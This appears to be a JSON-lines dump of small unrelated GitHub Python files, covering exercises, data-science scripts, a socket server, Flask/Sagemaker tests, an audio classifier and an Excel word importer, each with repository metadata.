time.sleep(1)\n","repo_name":"Sansub471/DataVisualization","sub_path":"matplotlib/data_gen.py","file_name":"data_gen.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27160151178","text":"from lab7.Swarm import Swarm\n\n\ndef main_7(min, max, n, population, generations=100, strategy=1):\n # swarm = Swarm(-5.12, 5.12, 2, 10)\n swarm = Swarm(min, max, n, population, generations=generations, strategy_choice=strategy)\n swarm.start()\n print(swarm, '\\n')\n\n\nmain_7(-5.12, 5.12, 2, 10)\nmain_7(-5.12, 5.12, 3, 10)\nmain_7(-5.12, 5.12, 5, 10, generations=100)\nmain_7(-5.12, 5.12, 10, 10, generations=500)\n","repo_name":"MrBlueSkyFox/Evolution_1","sub_path":"lab7/main_7.py","file_name":"main_7.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39529863427","text":"#vending_machine.py\r\ngoods ={'A': {'가격':10, '재고':2},\r\n 'B': {'가격':5, '재고':3}}\r\nprompt = '''Whice one do you want in the above list? 
...\r\n (Press Enter to quit)'''\r\nwhile True:\r\n    재고 = 0\r\n    for key, item in goods.items():\r\n        재고 += goods[key]['재고']\r\n        print(f'{key} = {item}')\r\n    if 재고 <= 0:\r\n        print(\"죄송하지만 재고가 없습니다!\")\r\n        break\r\n    상품 = input(prompt)\r\n    if 상품 == '': # Enter key\r\n        break\r\n    if 상품 not in goods.keys():\r\n        print(\"\\n죄송하지만 그런 상품은 없어요!\\n\")\r\n        continue\r\n    가격 = goods[상품]['가격']\r\n    재고 = goods[상품]['재고']\r\n    if 재고 < 1:\r\n        print('\\n다 떨어졌어요!\\n')\r\n        continue\r\n    현금 = int(input(\"돈을 넣으세요: \"))\r\n    잔돈 = 현금 - 가격\r\n    if 잔돈 >= 0:\r\n        print(f'여기 상품 {상품}와 잔돈 {잔돈}원입니다.\\n')\r\n        goods[상품]['재고'] = 재고 - 1\r\n    else:\r\n        print('\\n 현금이 모자라서 그대로 반환됩니다.\\n')\r\n","repo_name":"rangyi22/bwktim","sub_path":"python_for_student/vending_machine.py","file_name":"vending_machine.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18223158838","text":"from typing import List, Optional\n\n\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\n\nclass Solution:\n    def kthSmallest(self, root: Optional[TreeNode], k: int) -> int:\n        traversal = []\n\n        def inorder(node: Optional[TreeNode]):\n            if not node:\n                return\n            if node.left:\n                inorder(node.left)\n            traversal.append(node.val)\n            if node.right:\n                inorder(node.right)\n            return\n\n        inorder(root)\n        return traversal[k - 1]\n\n\ndef main():\n    solution = Solution()\n    tree = TreeNode(3)\n    tree.left = TreeNode(1)\n    tree.left.right = TreeNode(2)\n    tree.right = TreeNode(4)\n    print(solution.kthSmallest(tree, 1))\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"TheArcus02/LeetCodeSolutions","sub_path":"kth_smallest_bst.py","file_name":"kth_smallest_bst.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42105775041","text":"from random import random,gauss\n\nclass InvalidDataException(Exception):\n    count=0\n    def __init__(self, value):\n        InvalidDataException.count+=1\n        self.value = value\n    def __str__(self):\n        return repr(self.value)\n#    @classmethod\n#    def count(cls):\n#        return cls.count\n\nclass ContData:\n    def __init__(self,data):#speed,gspeed,stwa,belt)\n        if data['speed'] is None and data['speed_GPS'] is None:\n            raise InvalidDataException(data)\n            return\n        self.brake=data['brlt'];\n        self.speed=data['speed_GPS'] or data['speed'] or 0\n        self.gspeed=data['speed_GPS'];\n        self.belt=data['belt'] or 0;\n        self.stwa=data['stwa'] or 0;\n        self.force=self.speed**2 * self.stwa\n        self.ftgs=data['ftgs'];\n        #print self.ftgs\n        self.speed_lim=data['speed_lim'] or 250;\n        #print self.speed, data['speed_GPS'], data['speed']\n        self.vehicle_dist=gauss(self.speed/2+10,15);\n        self.time = data['time']\n","repo_name":"yeganer/codeFEST_Tinder","sub_path":"ContData.py","file_name":"ContData.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7125582732","text":"\"\"\"Utility methods for HAC environments.\"\"\"\n\n\ndef check_validity(model_name,\n                   initial_state_space,\n                   max_actions,\n                   timesteps_per_action):\n    \"\"\"Ensure environment configurations were properly entered.\n\n    This is done via a sequence of assertions.\n\n    Parameters\n    ----------\n    model_name : str\n        name of the Mujoco model file\n    initial_state_space : list of (float, float)\n        bounds for the initial values for all elements in the state space.\n        This is achieved during the reset 
procedure.\n max_actions : int\n maximum number of atomic actions. This will typically be\n flags.time_scale**(flags.layers).\n timesteps_per_action : int\n number of time steps per atomic action\n \"\"\"\n # Ensure model file is an \".xml\" file\n assert model_name[-4:] == \".xml\", \"Mujoco model must be an \\\".xml\\\" file\"\n\n for i in range(len(initial_state_space)):\n assert initial_state_space[i][1] >= initial_state_space[i][0], \\\n \"In initial state space, upper bound must be >= lower bound\"\n\n # Ensure max action and timesteps_per_action are positive integers\n assert max_actions > 0, \"Max actions should be a positive integer\"\n\n assert timesteps_per_action > 0, \\\n \"Timesteps per action should be a positive integer\"\n","repo_name":"AboudyKreidieh/h-baselines","sub_path":"hbaselines/envs/hac/env_utils.py","file_name":"env_utils.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"53"} +{"seq_id":"4220156774","text":"import cv2\r\nimport mediapipe as mp\r\nimport pyautogui\r\n\r\n\r\nmp_hands = mp.solutions.hands\r\nhands = mp_hands.Hands(static_image_mode=False, max_num_hands=1, min_detection_confidence=0.5, min_tracking_confidence=0.5)\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nif not cap.isOpened():\r\n print(\"Failed to open the camera\")\r\n exit()\r\n\r\nscreen_width, screen_height = pyautogui.size()\r\n\r\nwhile True:\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n\r\n flipped_frame = cv2.flip(frame, 1)\r\n frame_rgb = cv2.cvtColor(flipped_frame, cv2.COLOR_BGR2RGB)\r\n\r\n results = hands.process(frame_rgb)\r\n\r\n if results.multi_hand_landmarks:\r\n hand_landmarks = results.multi_hand_landmarks[0]\r\n\r\n index_finger_tip = hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP]\r\n index_finger_x = int(index_finger_tip.x * screen_width)\r\n index_finger_y = int(index_finger_tip.y * screen_height)\r\n\r\n pyautogui.moveTo(index_finger_x, index_finger_y)\r\n\r\n cv2.imshow(\"Camera\", flipped_frame)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"alexandre879/Crosshair-controller","sub_path":"crosshair_controller.py","file_name":"crosshair_controller.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27373462902","text":"# Creates a series of polygon outlines representing spatial scenarios, by clipping out a series of constraints\n# Designed to create housing development zone scenarios\n# Reads constraint layer names from a table\n# Erases each constraint from the starting layer, converts to single part, removes areas less than threshold size,\n# dissolves again, adds a label\n# At the end, merges all constraint layers into a single scenario file, designed for input to Spatial Strategy Analysis.py\n# Starting layer should already contain text field called Scenario for labels\n# -----------------------------------------------------------------------------------------------------------------------\n\nimport time, arcpy, os, MyFunctions\n\nprint(''.join([\"## Started on : \", time.ctime()]))\n\narcpy.CheckOutExtension(\"Spatial\")\narcpy.env.overwriteOutput = True # Overwrites files\n\n# Define input parameters\n# -----------------------\ngdb = r\"D:\\cenv0389\\Oxon_GIS\\Oxon_county\\NaturalCapital\\Scenario_analysis.gdb\"\narcpy.env.workspace = gdb\nstart_layer = \"Halo1km\"\nstart_label 
= \"Halo1km\"\n# Threshold size: polygons smaller than this will be deleted\nthreshold_size = 500\nInfoTable = os.path.join(gdb, \"OP2050ScenariosDes\")\noutput = \"ScenariosDes\"\n\n# Get a list of constraint layer names and short labels from InfoTable\nconstraint_names = []\nconstraints = arcpy.da.SearchCursor(InfoTable, \"Name\")\nfor constraint in constraints:\n    constraint_names.append(str(constraint[0]))\nconstraint_labels = []\nlabels = arcpy.da.SearchCursor(InfoTable, \"Label\")\nfor label in labels:\n    constraint_labels.append(str(label[0]))\n\n# Successively erase constraints, beginning with start layer\ni = 0\nnew_layer = \"\"\nnew_label = start_label + \"_no\"\nmerge_layers = []\nfor constraint_name in constraint_names:\n    i = i + 1\n    if i == 1:\n        in_layer = start_layer\n        out_layer = start_layer + \"_no\" + constraint_labels[i-1]\n    else:\n        in_layer = new_layer\n        out_layer = in_layer[:-8] + constraint_labels[i-1]\n    print(\"Erasing \" + constraint_name + \" from \" + in_layer + \" to make \" + out_layer)\n    arcpy.Erase_analysis(in_layer, constraint_name, out_layer)\n    # Add new scenario label\n    new_label = new_label + constraint_labels[i-1]\n    print(\"Label is \" + new_label)\n    arcpy.CalculateField_management(out_layer, \"Scenario\", \"'\" + new_label + \"'\", \"PYTHON_9.3\")\n\n    # Convert to single part\n    arcpy.MultipartToSinglepart_management(out_layer, out_layer + \"_sp\")\n    # Delete fragments smaller than viable threshold size\n    arcpy.MakeFeatureLayer_management(out_layer + \"_sp\", \"del_lyr\", \"Shape_Area < \" + str(threshold_size))\n    arcpy.DeleteFeatures_management (\"del_lyr\")\n    arcpy.Delete_management(\"del_lyr\")\n    # Dissolve again\n    arcpy.Dissolve_management(out_layer + \"_sp\", out_layer + \"_sp_diss\", \"Scenario\")\n    new_layer = out_layer + \"_sp_diss\"\n    merge_layers.append(new_layer)\n\nprint(\"Merging into single scenario file:\" + \"\\n\".join(merge_layers))\narcpy.CopyFeatures_management(start_layer, output)\narcpy.Append_management(merge_layers, output, \"NO_TEST\")\n\nprint(\"Finished on \" + time.ctime())\n\nexit()","repo_name":"nismod/natural-capital-mapping","sub_path":"Create_Scenarios.py","file_name":"Create_Scenarios.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42207639957","text":"import os, node\ncolors = [\"green\", \"blue\", \"violet\", \"crimson\", \"alabaster\", \"orange\", \"aqua\", \"amaranth\", \"purple\", \"pink\", \"red\", \"amber\", \"bronze\", \"brown\", \"gold\", \"rose\", \"silver\", \"yellow\", \"amethyst\", \"white\", \"brass\", \"fuchsia\", \"ruby\", \"aquamarine\", \"lime\", \"gray\", \"auburn\", \"azure\", \"batorange\", \"beige\", \"black\", \"blond\", \"blood\", \"sapphire\", \"lavender\", \"lilac\", \"maroon\", \"turquoise\", \"rose\", \"burgundy\", \"cadet\", \"cerulean\", \"charcoal\", \"chartreuse\", \"copper\", \"coral\", \"cyan\", \"ebony\", \"ultramarine\", \"firebrick\", \"garnet\", \"ivory\", \"indigo\", \"jade\", \"khaki\", \"magenta\", \"mahogany\", \"mauve\", \"olive\", \"opal\", \"periwinkle\", \"scarlet\", \"sienna\", \"tan\", \"teal\", \"topaz\", \"umber\", \"vermillion\"]\n\nnodes = []\n\ndef openFolder(userF):\n    files = []\n    for root, dirs, filenames in os.walk(userF):\n        files = filenames\n    return files\n\ndef findColors(files, userF):\n    for f in files:\n        location = userF + \"/\" + f\n\n        fh = open(location, \"r\")\n\n        fh = 
fh.read()\n        fh = fh.replace('\\n', '')\n        fh = fh.replace('\\r', '')\n        fh = fh.replace('\\\\', '')\n        fh = fh.replace('!', '.')\n        fh = fh.replace('?', '.')\n        sen = fh.split('. ')\n\n        for s in sen:\n            s = s.replace('.', '')\n            tmp = s.split(' ')\n            for word in tmp:\n                new = True\n                if word in colors:\n                    for each in nodes:\n                        if word in each:\n                            each[1].colorAgain(word, tmp)\n                            new = False\n                    if new:\n                        nodes.append([word, node.color(word, tmp)])\n\ndef main():\n    userF = \"books/\"\n    files = openFolder(userF)\n    findColors(files, userF)\n    for each in nodes:\n        each[1].getColorLoc()\n\nmain()\n","repo_name":"ironsketch/theEmotionsofBooks","sub_path":"stuff/old/oldmain.py","file_name":"oldmain.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2909852335","text":"#!/usr/bin/python3\n''' Print the State object with the name passed as argument from hbtn_0e_6_usa '''\n\nimport sys\nfrom model_state import Base, State\nfrom sqlalchemy import (create_engine)\nfrom sqlalchemy.orm import sessionmaker\n\nif __name__ == \"__main__\":\n    engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'\n                           .format(sys.argv[1], sys.argv[2], sys.argv[3]),\n                           pool_pre_ping=True)\n    Session = sessionmaker(bind=engine)\n    session = Session()\n    result = session.query(State).filter(State.name == sys.argv[4])\n    for i in result:\n        print(\"{}\".format(i.id))\n    if len(result.all()) == 0:\n        print(\"Not found\")\n    session.close()\n","repo_name":"josecaro02/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/10-model_state_my_get.py","file_name":"10-model_state_my_get.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24254351416","text":"import socket\r\n\r\nfrom .worker import ThreadController, Worker\r\nfrom ai_company.core import logger\r\n\r\nclass AIServer:\r\n    def __init__(self, host, port, handler_factory, multi_worker=False):\r\n        self.host = host\r\n        self.port = port\r\n        self.multi_worker = multi_worker\r\n        self.handler_factory = handler_factory\r\n        self.thread_controller = None\r\n\r\n    def run(self):\r\n        listener = socket.socket()\r\n        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n        listener.bind((self.host, self.port))\r\n        listener.listen(10)\r\n        logger.info(f\"Ready to accept remote connections, listening on {self.host}:{self.port}\")\r\n        try:\r\n            if self.multi_worker:\r\n                self.thread_controller = ThreadController()\r\n                while True:\r\n                    conn, addr = listener.accept()\r\n                    self.thread_controller.create_work(addr, conn, self.handler_factory)\r\n            else:\r\n                conn, addr = listener.accept()\r\n                worker = Worker(addr, conn, self.handler_factory)\r\n                worker.work()\r\n        except KeyboardInterrupt as e:\r\n            logger.info(\"AIServer was terminated by the user\")\r\n            if self.thread_controller:\r\n                self.thread_controller.request_stop()\r\n            else:\r\n                worker.stop()\r\n        finally:\r\n            logger.info(\"AIServer is shutting down, please wait...\")\r\n            listener.close()\r\n            if self.thread_controller:\r\n                self.thread_controller.join()\r\n\r\n\r\n","repo_name":"NorthenFleet/AI-DNA","sub_path":"core/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12807075182","text":"import requests as rq\nfrom lxml import *\nfrom bs4 import BeautifulSoup as bs\nlink = \"https://browser-info.ru/\"\nheaders = {\n\t\"User-Agent\" : \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; 
rv:98.0) Gecko/20100101 Firefox/98.0\",\n}\nrequest = rq.get(link, headers=headers)\n\nif request.status_code == 200:\n\tprint(\"Connected!\")\nsoup = bs(request.text, \"lxml\")\nua = soup.find(\"div\", {\"id\":\"user_agent\"})\nprint(ua.text)\n\n\n\ninput()\n\n\n'''\nhtml_doc = \"\"\"\n<html><head><title>The Dormouse's story</title></head>\n\n<h1>The Dormouse's story</h1>\n\n<body>\n\t<div>\n\t<div>\n\t\t<h1 class=\"child\">i am very good boy!</h1>\n\t\t<h1 class=\"child\" id=\"sam\">Hi Sam!</h1>\n\t</div>\n\n\t</div>\n\n\t<div>\n\t\t<p>Once upon a time there were three little sisters; and their names were\n\t\t\t<a id=\"link1\">Elsie</a>,\n\t\t\t<a id=\"link2\">Lacie</a> and\n\t\t\t<a id=\"link3\">Tillie</a>;\n\t\t\tand they lived at the bottom of a well.</p>\n\t\t<p>...</p>\n\t</div>\n</body>\n</html>
\n\"\"\"\n\n#soup = bs(html_doc, \"lxml\")\n\n#class_child = soup.find_all(\"h1\", class_=\"child\")\n#for item in class_child:\n#\tprint(item.text)\n\n#sam = soup.find(\"h1\", {\"id\":\"sam\"})\n#print(type(sam))\n\n#all_a = soup.find_all(\"a\")\n#for item in all_a:\n#\tprint(item.get(\"id\"))\n\n#parents_a = soup.find(\"a\").find_next()\n#print(parents_a)\n'''","repo_name":"amxr1338/projects","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25682456167","text":"# Generators are functions that return a sequence of values.\n# We use the yield statement to return values from the function.\na=[12,14,14,41,43]\n\ndef disp(b):\n    yield b  # yields the entire list as a single item; 'yield from b' would yield the elements one by one\n\nresult = disp(a)\nprint(result)\nprint(type(result))\nfor i in result:\n    print(i)\n\n\n","repo_name":"Suryalama/pylesson","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42817906915","text":"import os\nimport sys\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\n\nfrom flask_app import *\n\nimport numpy as np\nimport boto3\nimport env\nimport cv2\nfrom PIL import Image\n\n\n# AWS SECRETS\nAWS_KEY = env.AWS_KEY\nAWS_SECRET = env.AWS_SECRET\n\n##############\n# UNIT TESTS #\n##############\n\n\ndef test_semantic_input_preprocess():\n    \"\"\" Test the semantic input preprocess function\n    \"\"\"\n    pil_img = Image.open(\"one-line-test.png\")\n    image = np.asarray(pil_img.convert('L'))\n    assert(image is not None)  # Check test image was read properly\n    image_list, seq_lengths = semantic_input_preprocess(image)\n    assert(type(image_list) == list)  # Check output type\n    assert(image_list is not None)  # Check that the list not None\n    assert(type(seq_lengths) == list)\n    assert(len(seq_lengths) > 0)  # Check calculating seq lengths\n    print(\"Test semantic_input_preprocess passed!\")\n\n\ndef test_semantic_endpoint_pred():\n    \"\"\" Test the semantic endpoint prediction API call and postprocessing\n    \"\"\"\n    pil_img = Image.open(\"one-line-test.png\")\n    image = np.asarray(pil_img.convert('L'))\n    assert(image is not None)  # Check test image was read properly\n    # Use separately tested function to generate test input\n    input_image, seq_lengths = semantic_input_preprocess(image)\n    # AWS Sagemaker client for API authorization\n    client = boto3.client(\n        'sagemaker-runtime',\n        region_name='us-east-1',\n        
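# AWS_KEY/AWS_SECRET above are loaded from the local env.py module imported at\n        # the top of this file; the Sagemaker endpoint call below needs valid credentials.\n        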
aws_access_key_id=AWS_KEY,\n aws_secret_access_key=AWS_SECRET\n )\n # Generate test data from endpoint\n data = semantic_endpoint_pred(client, \"semantic\", input_image, seq_lengths)\n # Output to test\n vocab_indices = parse_tensor_to_vocab_indices(data, seq_lengths)\n assert(vocab_indices is not None) # Check that an output exists\n assert(type(vocab_indices) == list) # Check output is list\n assert(len(vocab_indices) > 0) # Check that some prediction exists\n assert(type(vocab_indices[0]) == int) # Check list is of type integer\n print(\"Test parse_tensor_to_vocab_indices passed!\")\n\n\ndef test_yolo_endpoint_pred():\n \"\"\" Test yolo endpoint Sagemaker API call function\n \"\"\"\n raw_im = cv2.imread(\"test.png\")\n assert(raw_im is not None) # Check test image was read properly\n # Preprocess image to bytes\n retval, buffer = cv2.imencode('.jpg', raw_im)\n bytes_jpg = base64.b64encode(buffer)\n assert(type(bytes_jpg) == bytes) # Check request body is bytes\n # AWS Sagemaker client for API authorization\n client = boto3.client(\n 'sagemaker-runtime',\n region_name='us-east-1',\n aws_access_key_id=AWS_KEY,\n aws_secret_access_key=AWS_SECRET\n )\n preds = yolo_endpoint_pred(client, 'yolov5', 'image/jpeg', bytes_jpg)\n assert(preds is not None) # Check response body not None\n assert(type(preds) == list) # Check nonempty response is list\n if(len(preds) > 0):\n # Check type and structure of output dictionary\n assert(type(preds[0]) == dict)\n assert(type(preds[0]['label']) == int)\n assert(type(preds[0]['x']) == float)\n assert(type(preds[0]['y']) == float)\n assert(type(preds[0]['width']) == float)\n assert(type(preds[0]['height']) == float)\n assert(type(preds[0]['conf']) == float)\n if(len(preds) > 1): # Check if list is sorted\n assert(preds[0]['y'] < preds[1]['y'])\n print(\"Test yolo_endpoint_pred passed!\")\n\n\ndef test_split_to_lines():\n \"\"\" Test image splitting from prediction dictionary\n \"\"\"\n filename = \"test.png\" # Filename for input to tested function\n\n # Format image input to get preds\n raw_im = cv2.imread(filename)\n assert(raw_im is not None) # Check test image was read properly\n # Preprocess image to bytes\n retval, buffer = cv2.imencode('.jpg', raw_im)\n bytes_jpg = base64.b64encode(buffer)\n assert(type(bytes_jpg) == bytes) # Check request body is bytes\n # AWS Sagemaker client for API authorization\n client = boto3.client(\n 'sagemaker-runtime',\n region_name='us-east-1',\n aws_access_key_id=AWS_KEY,\n aws_secret_access_key=AWS_SECRET\n )\n # Get sample preds from separately tested yolo_endpoint_pred function\n preds = yolo_endpoint_pred(client, 'yolov5', 'image/jpeg', bytes_jpg)\n # Tested output\n split_images = split_to_lines(filename, preds)\n assert(split_images is not None) # Check output not empty\n assert(type(split_images) == list)\n # If there are lines that are split, check image data type\n if(len(split_images) > 0):\n assert(type(split_images[0]) == np.ndarray)\n print(\"Test split_to_lines passed!\")\n\n# RUN TESTS\ntest_semantic_input_preprocess()\ntest_semantic_endpoint_pred()\ntest_parse_tensor_to_vocab_indices()\ntest_yolo_endpoint_pred()\ntest_split_to_lines()\n","repo_name":"SheetMusic-Team-3/sheet-music-plus-plus","sub_path":"testing/flask_app_tests.py","file_name":"flask_app_tests.py","file_ext":"py","file_size_in_byte":5823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19965280807","text":"\nimport os\n\nimport pandas as pd\nimport numpy as np\n\nimport seaborn as 
sns\nimport matplotlib.pyplot as plt\n\nimport librosa\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn import metrics\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution1D, Convolution2D, MaxPooling2D\nfrom keras.optimizers import Adam\nfrom keras.utils import np_utils\n\n\nclass Processor():\n def __init__(self, data):\n\n self.settings = data\n self.data_dir = data['data_dir']\n self.train_csv = data['train_csv']\n self.pickle_train = data['pickle_train']\n self.pickle_test = data['pickle_test']\n self.test_csv = data['test_csv']\n self.test_size = data['test_size']\n self.random_state = data['random_state']\n self.plt_figsize = data['plt_figsize']\n self.n_mfcc = data['librosa_n_mfcc']\n self.res_type = data['librosa_res_type']\n self.num_epochs = data['keras_num_epochs']\n self.loss_var = data['keras_loss']\n self.metrics = data['keras_metrics']\n self.optimizer = data['keras_optimizer']\n self.shuffle = data['keras_shuffle']\n self.verbose = data['keras_verbose']\n self.filter_size = data['keras_filter_size']\n\n self.X_train = None\n self.X_test = None\n self.y_train = None\n self.y_test = None\n self.train_df = None\n self.test_df = None\n self.history = None\n self.acc = None\n self.val_acc = None\n self.loss = None\n self.val_loss = None\n\n self.lb = None\n self.predictions = None\n\n def process_training(self):\n if os.path.isfile(self.pickle_train):\n print('Loading from pickle, {}'.format(self.pickle_train))\n self.train_df = pd.read_pickle(self.pickle_train)\n else:\n train = pd.read_csv(self.data_dir + self.train_csv)\n\n self.train_df = pd.DataFrame(train.apply(self.train_parser, axis=1))\n self.train_df.rename(columns={0:'Features'}, inplace=True)\n self.train_df['Label'] = self.train_df['Features'].map(lambda x: x[1])\n self.train_df['Features'] = self.train_df['Features'].map(lambda x: x[0])\n self.train_df.to_pickle(self.pickle_train)\n\n target = self.train_df['Label']\n features = self.train_df.drop('Label', axis=1)\n\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(features, target, test_size=self.test_size, random_state=self.random_state)\n\n\n def train_parser(self, row):\n # function to load files and extract features\n file_name = os.path.join(os.path.abspath(self.data_dir), 'Train', str(row.ID) + '.wav')\n # handle exception to check if there isn't a file which is corrupted\n try:\n # # here kaiser_fast is a technique used for faster extraction\n X, sample_rate = librosa.load(file_name, res_type=self.res_type)\n # # we extract mfcc feature from data\n mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=self.n_mfcc).T,axis=0)\n except Exception as e:\n print(\"Error encountered while parsing file: \", file_name)\n return None\n\n feature = mfccs\n label = row.Class\n\n return [feature, label]\n\n def test_parser(self, row):\n # function to load files and extract features\n file_name = os.path.join(os.path.abspath(self.data_dir), 'Test', str(row.ID) + '.wav')\n # handle exception to check if there isn't a file which is corrupted\n try:\n # # here kaiser_fast is a technique used for faster extraction\n X, sample_rate = librosa.load(file_name, res_type=self.res_type)\n # # we extract mfcc feature from data\n mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=self.n_mfcc).T,axis=0)\n except Exception as e:\n print(\"Error encountered while parsing file: \", 
file_name)\n return None\n\n return [mfccs, row.ID]\n\n def prep_x_test(self):\n if os.path.isfile(self.pickle_test):\n print('Loading from pickle, {}'.format(self.pickle_test))\n self.test_df = pd.read_pickle(self.pickle_test)\n else:\n test = pd.read_csv(self.data_dir + self.test_csv)\n self.test_df = pd.DataFrame(test.apply(self.test_parser, axis=1))\n # self.test_df.rename(columns={0:'Features'}, inplace=True)\n self.test_df.rename(columns={0:'Features'}, inplace=True)\n self.test_df['ID'] = self.test_df['Features'].map(lambda x: x[1])\n self.test_df['Features'] = self.test_df['Features'].map(lambda x: x[0])\n self.test_df.to_pickle(self.pickle_test)\n\n\n\n def show_accuracy(self):\n plt.figure(figsize=self.plt_figsize)\n acc = list(self.history.history['acc'])\n val_acc = list(self.history.history['val_acc'])\n plt.plot(acc)\n plt.plot(val_acc)\n plt.title('model_accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='best')\n plt.savefig('output/accuracy.png')\n plt.show()\n\n def show_loss(self):\n plt.figure(figsize=self.plt_figsize)\n loss = list(self.history.history['loss'])\n val_loss = list(self.history.history['val_loss'])\n plt.plot(loss)\n plt.plot(val_loss)\n plt.title('model_loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='best')\n plt.savefig('output/loss.png')\n plt.show()\n\n def predict (self):\n X_predict = np.array(self.test_df.Features.tolist())\n predictions = self.model.predict_classes(X_predict)\n self.test_df['prediction_number'] = predictions\n self.test_df['prediction_label'] = self.lb.inverse_transform(predictions)\n\n\n def run(self, num_epochs):\n\n X_train = np.array(self.X_train.Features.tolist())\n y_train = np.array(self.y_train.tolist())\n\n X_test = np.array(self.X_test.Features.tolist())\n y_test = np.array(self.y_test.tolist())\n\n lb = LabelEncoder()\n self.lb = lb\n\n y_train = np_utils.to_categorical(lb.fit_transform(y_train))\n y_test = np_utils.to_categorical(lb.fit_transform(y_test))\n\n num_labels = y_train.shape[1]\n filter_size = self.filter_size\n model = Sequential()\n model.add(Dense(256, input_shape=(self.n_mfcc,)))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n\n model.add(Dense(256))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n\n model.add(Dense(num_labels))\n model.add(Activation('softmax'))\n\n model.compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='adam')\n\n self.history = model.fit(X_train, y_train, epochs=num_epochs, validation_data=(X_test, y_test), shuffle=False, verbose=0)\n self.model = model\n return True\n","repo_name":"davidhaase/audio-classification","sub_path":"audioprocessor.py","file_name":"audioprocessor.py","file_ext":"py","file_size_in_byte":7117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8538790267","text":"import os\nimport re\nimport json\nimport logging\nfrom openpyxl import load_workbook\nfrom utils import util_logger\n\nloger_name = os.path.basename(__file__).split(\".\")[0]\nutil_logger.set_logger_config(loger_name)\nlogger = logging.getLogger(loger_name)\n\nfile_path = \"D:\\\\CodeOkay\\\\tuling-tool\\\\data\\\\xlsx\\\\英语单词.xlsx\"\nsheet_name = \"英文单词\"\ncol = 2\n\nbegin_row = 1\nend_row = 1000\n\n\ndef load_data():\n wb = load_workbook(file_path)\n ws = wb[sheet_name]\n rows = ws[begin_row:end_row]\n for idx, row in enumerate(rows):\n if row[col-1]:\n row_num = idx+begin_row\n val = row[col-1].value\n try:\n 
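# insert_db parses this row's JSON payload; a failure here is caught and logged below\n                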
insert_db(row_num, val)\n            except Exception as e:\n                logger.error(f\"Failed to write data. row_num: {row_num}, {e}\")\n\n\ndef insert_db(row_num, val):\n    logger.info(f\"Start writing data, row_num: {row_num}\")\n\n    val_dict = json.loads(val)\n    info = val_dict.get(\"nlpResponse\", {}).get(\"intent\", {}).get(\"parameters\", {}).get(\"result\", {}).get(\"info\", {})\n    if info:\n        explanations = info.get(\"explanations\", [])\n        explanations_dict = {}\n        for explanation in explanations:\n            if explanation[\"pos\"] in explanations_dict:\n                explanations_dict[explanation[\"pos\"]] += f\";{explanation['meaning']}\"\n            else:\n                explanations_dict[explanation[\"pos\"]] = explanation['meaning']\n\n        word = {\n            \"word\": info.get(\"word\", \"\"),\n            \"phonetic_en\": info.get(\"phoneticEn\", \"\"),\n            \"phonetic_us\": info.get(\"phoneticUs\", \"\"),\n            \"explanations\": json.dumps(explanations_dict),\n            